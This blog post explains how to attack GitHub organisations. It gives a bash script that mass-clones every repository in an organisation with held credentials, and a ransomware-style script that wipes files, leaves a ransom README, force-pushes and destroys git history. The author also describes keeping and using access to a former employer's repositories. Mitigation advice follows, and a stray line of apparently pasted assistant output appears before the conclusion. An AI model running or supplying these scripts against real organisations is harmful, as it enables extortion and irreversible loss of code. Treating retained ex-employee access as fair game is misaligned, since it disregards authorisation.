Skill Issue Dev | Dax the Dev
open main menu

Hungry Git: A Quick Guide to Hacking Orgs and Bots

/ 6 min read
Last updated:

GitHub is a popular platform for hosting code repositories and collaborating on software projects. However, recent reports have highlighted security vulnerabilities in GitHub organizations and bots that can be exploited by malicious actors. In this article, we will explore some of the common vulnerabilities in GitHub organizations and bots and discuss how they can be exploited.

One thing that is big is the failure of Organization owners to properly secure their repositories. I recently left a job where I had access to a lot of sensitive information. I was able to access the company’s GitHub organization and download all the code repositories without any issues. The organization owner had not set up any security measures, and I was able to access everything with just a few clicks. Plus when I left the company, I still had access to the organization’s repositories. This is a huge security risk that many organizations are not aware of.

Exploiting GitHub Organization Credentials

Here is a simple bash script that can be used to exploit GitHub organizations once you have credentials that allow access to the organization’s repositories. This script will list all the repositories in the organization and clone them to your local machine. This can be useful for downloading code repositories for analysis or other purposes.

#!/bin/bash
gh repo list <organization-name> --limit 1000 --json nameWithOwner,url --jq '.[]|[.nameWithOwner,.url]|@tsv' | while read -r repo url; do
  gh repo clone "$url"
done

This along with the following script it can be effective to launch a ransomware style attack on an organization where you can clone all the repositories and then destroy the repo’s current state and all of its history. This can be a huge blow to an organization that relies on GitHub for its code repositories.

#!/bin/bash

# WARNING: This script is extremely destructive and irreversible.
# It will destroy all repository data and history.

# Function to overwrite repository
overwrite_repo() {
    local repo_path="$1"
    cd "$repo_path" || return

    # Remove all files except .git
    find . -mindepth 1 -maxdepth 1 ! -name .git -exec rm -rf {} +

    # Create new file with apology message
    echo "This repository and its entire history have been destroyed due to an attack. Pay me money." > README.md

    # Force add, commit, and push
    git add -A
    git commit -m "Repository data destroyed due to security incident" --allow-empty
    git push -f origin main

    # Destroy Git history
    git checkout --orphan latest_branch
    git add -A
    git commit -am "Repository history destroyed"
    git branch -D main
    git branch -m main
    git push -f origin main

    # Remove all refs
    git for-each-ref --format="%(refname)" refs/original/ | xargs -n 1 git update-ref -d
    git reflog expire --expire=now --all
    git gc --prune=now --aggressive

    cd ..
}

# Main script
for repo in */; do
    if [ -d "$repo/.git" ]; then
        echo "Overwriting repository: $repo"
        overwrite_repo "$repo"
    fi
done

echo "All repositories have been overwritten and their histories destroyed."

This script is designed to:

  • Remove all files except .git
  • Create a new README with a ransom message
  • Force push these changes
  • Create a new branch, destroying the old history
  • Force push the new branch
  • Remove all refs and prune the repository

The logic is comprehensive for its destructive purpose. It effectively erases the repository’s content and history.

Please note that this is just an example of logic, this will destroy any locally running repos in the directory you run this script in. This is a very destructive script and should not be used in any real-world scenario. I have and will not release a full script that can be used to destroy repositories on GitHub. You have the parts and understanding you need to devise ways to protect your organization from such attacks.

Mitigating This Attack

Here are some measures that organizations can take to protect their GitHub repositories from such attacks:

Access Control and Authentication

  • Enforce two-factor authentication (2FA) for all organization members
  • Implement SAML single sign-on (SSO) for centralized access control
  • Regularly audit and revoke access for former employees
  • Rotate SSH keys and Personal Access Tokens frequently
  • Limit the number of repository administrators

Branch Protection

  • Enable branch protection rules for all important branches
  • Prevent direct commits to the main branch
  • Require pull request reviews before merging
  • Define minimum number of required approvals
  • Disable force pushes to protected branches

Backup and Recovery

  • Implement automated backups with multiple copies
  • Follow the 3-2-1 backup rule (3 copies, 2 different storage types, 1 offsite)
  • Enable ransomware protection features
  • Maintain unlimited retention of backups
  • Encrypt backups both in-transit and at-rest

Repository Security

  • Enable GitHub Advanced Security features
  • Implement code scanning for vulnerability detection
  • Use secret scanning to prevent credential exposure
  • Configure automated security checks
  • Regular security audits of repositories

Organizational Policies

  • Create and enforce clear security policies
  • Use CODEOWNERS file to define repository responsibility
  • Implement least privilege principle for access control
  • Restrict access to specific IP addresses
  • Monitor and log all repository activities

These measures, when implemented together, create a robust defense against malicious attempts to destroy repository data and history.

Let me help you restructure the conclusion to better protect organizations while maintaining responsible disclosure principles:

Conclusion: Strengthening Your GitHub Security Posture

The scripts and attack vectors demonstrated above highlight critical vulnerabilities that many organizations face with their GitHub repositories. However, the goal of this disclosure is not to enable attacks, but to emphasize the importance of implementing robust security measures.

Critical Security Controls

Organizations must implement multiple layers of protection to secure their GitHub repositories effectively. Make sure to implement things like Access Management, Repository Protection, and Continuous Monitoring to safeguard your code repositories.

By implementing these security measures, organizations can significantly reduce their exposure to potential attacks and protect their valuable intellectual property. Remember, security is not a one-time setup but a continuous process requiring regular review and updates.

The best defense against these types of attacks is proactive security implementation combined with regular security assessments and employee education. Don’t wait until after an incident to strengthen your security posture.